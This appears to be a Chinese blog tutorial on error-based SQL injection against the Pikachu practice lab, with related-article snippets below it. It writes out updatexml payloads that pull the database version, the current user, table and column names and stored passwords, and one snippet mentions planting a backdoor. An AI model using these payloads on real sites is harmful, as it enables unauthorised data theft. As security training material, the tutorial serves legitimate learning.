sql注入---报错注入

最新推荐文章于 2024-04-26 22:53:23 发布
最新推荐文章于 2024-04-26 22:53:23 发布
阅读量182 收藏
点赞数
分类专栏: it 文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arissa666/article/details/131792121
版权

updatexml():对XML文档数据进行查询和修改

extractvalue():对XML文档数据进行查询

floor():取整的函数

前提是未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;或者后台未对一些具有报错功能的函数进行过滤

一、查看数据库版本:UPDATEXML (XML_document, XPath_string, new_value)

输入语句 v' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) #

 可以看到返回的sql版本是5.5.53

 二、查看数据库当前用户

v' and  updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)# 

三、看数据库库名

v' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) #

 四、查看表名

知道数据库名字,刚才的版本5.0以上肯定 用默认数据库information_schema,可以参考上一篇的SQL注入--information_schema注入_arissa666的博客-CSDN博客

k'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#

如果提示只能显示一行就用limit限制显示一行

 k' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu'limit 0,1)),0)#

 k' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu'limit 1,1)),0)#

 

 

五、看表字段

v' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit 2,1)),0)#

 六、查字段内容

v' and  updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#

 

学海无涯一叶扁舟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
手动识别 SQL 注入(获取所有用户名)
m0_71171042的博客
06-20 487
大多数现代 Web 应用程序都实现某种数据库,而 SQL 是最常用的查询数据库的语言。SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作1.开启OWASP靶机和Kali虚拟机2.kali中登陆dvwa,进入 SQL Injection(SQL 注入)页面,安全等级调为low1.通过输入一个数字来测试应用程序的正常行为。将用 户 ID 设置为 1,然后单击“提交”。 通过查看结
SQL注入注入
最新发布
banliyaoguai的博客
05-18 860
(select 1 from (select count(*),concat(注入语句,floor(rand(0)*2))x from information_schema.tables group by x)a)我们可以使用limit来查看是否将所有表名全部爆出(上面的例子爆出来的数据是全的,下面是演示如何用limit爆出来数据)gtid_subtract(concat(0x7e,注入语句,0x7e),1)updatexml(1,concat(0x7e,注入语句,0x7e),1)
sql注入
Ran_799的博客
07-10 373
简单的sql注入笔记
sql注入查mysql表名_GET型SQL注入注入点和数据库类型的判断)
weixin_32418703的博客
02-11 2285
网页一般为asp,php,jsp,aspx注入对于GET型的SQL,语句一般为select * from 表名 where 字段=YYYY可为整数型,也可为字符型,因而在执行sql语句时是有很大区别的。select * from 表名 where 字段=12select * from 表名 where 字段='abc'这使得在判断是否存在注入点时,构造的语句也有很大的区别。注入点的判断:先输入' ...
SQL注入学习之默认表名解读(二)
公众号:乌云安全
02-03 1284
0x00 information_schema 这个表(视图)是在MySQL5以后的才有的,现在MySQL4应该是很少了,所以都围绕着MySQL5来讲解,information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息,让我们从爆破表名到了可以直接查询。 mysql> show tables; +---------------------------------------+ | Tables_in_information_schema | +---
web-注入-皮卡丘靶场
07-15
防止注入的关键在于对用户输入进行严格的验证和过滤,避免在误消息中泄露敏感信息,以及使用预编译的SQL语句(如参数化查询或存储过程),以减少SQL注入的风险。在进行渗透测试或安全训练时,皮卡丘靶场提供了...
第四节 基于SQL注入-01
09-15
基于SQL注入 SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入参数中inject恶意SQL代码来获取敏感数据或控制服务器。今天,我们将讨论基于SQL注入,包括其分类、发现和利用方法。 SQL注入...
SQL注入-xiabee1
08-03
1.1 安装靶场 1.2 手工注入 1.2.1 联合查询注入 1.2.2 注入 1.3 源码审计
第六节 GET注入-01
09-15
【第六节 GET注入-01】是关于Web安全中的一个常见攻击手段——注入的讲解。注入主要是利用应用程序在处理查询时,因误反馈信息过于详细而暴露敏感数据的一种方法。通常,它涉及到SQL查询的嵌套结构,...
黑客学习-SQL注入(字符型):Hackbar获取网站账号和密码
weixin_49349476的博客
09-27 2767
检查出网站存在的漏洞类型是字符型的SQL漏洞,之后利用火狐浏览中的Hackbar插件,进行SQL注入,获取登录账号和密码
SQL注入-注入
qq_65240014的博客
08-08 789
本文主要介绍一种结合burpsuite的注入sql注入方法
SQL注入总结
2301_77472496的博客
10-31 148
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。大家也许都听过某某学长通过攻击学校数据库修改自己成绩的事情,这些学长们一般用的就是SQL注入方法。
SQL--注入学习
Z11762的博客
04-04 813
注入就是通过一些函数的误使用后从的内容中获取信息,就是在可以进行的位置,调用特殊的函数执行,利用函数使其输出误结果来获取数据库的相关信息。当注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入SQL代码会,并且是通过mysql_error(),mysqli_error()等返回误,那么就存在注入的可能性。(1).BigInt数据类型溢出。
MSSQL数据库注入
zhuangsle的博客
08-26 1051
MSSQL数据库注入实践 一、MSSQL注入的基础知识 (一)注入点的检测 1、数据库类型判断 概述 MSSQL数据库中,存在一个系统表sysobjects,可以通过判断这个表是否存在来判断该数据库是否为MSSQL数据库 SQL语句执行 select * from admin where id=1 and exists(select * from sysobjects); # 正常返回结果,则表示存在该数据库表 select * from admin where id=1 and exists(se
SQL注入
q
04-26 810
站位到7order by 7说明该数据库列表有6位第4位和第5位显示出来,在4,5进行插入语句查询数据库版本,服务器操作系统查询数据库名,用户名查询数据库表名查看表明为“admin”中的列名查询表名为“admin”,列名为“username,password”的第一个字段查询表名为“admin”,列名为“username,password”的第二个字段查询是否有读取权限并没有权限,需要在my.ini添加secure_file_priv=“”读取d盘下的123.txt文件写入后门代码使用哥斯拉连接。
SQL注入讲课准备
weixin_62420492的博客
01-15 538
一.基本函数
SQL注入之获取数据库用户表数据
qq_59099375的博客
03-18 1288
SQL注入获取数据库数据
sql server中如何查询当前登录用户名_Sql注入基础原理介绍
weixin_39581972的博客
12-11 3655
文章由 Jewel591 创作,引用请注明来源,感谢配合一、Sql注入简介Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。二、Web 程序三层架构三层架构(3-tier architecture) 通常意义上就是将整个业务应用划分为:- 界面层(User Interface la...
SQL注入实战:sqli-labs实验详解
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值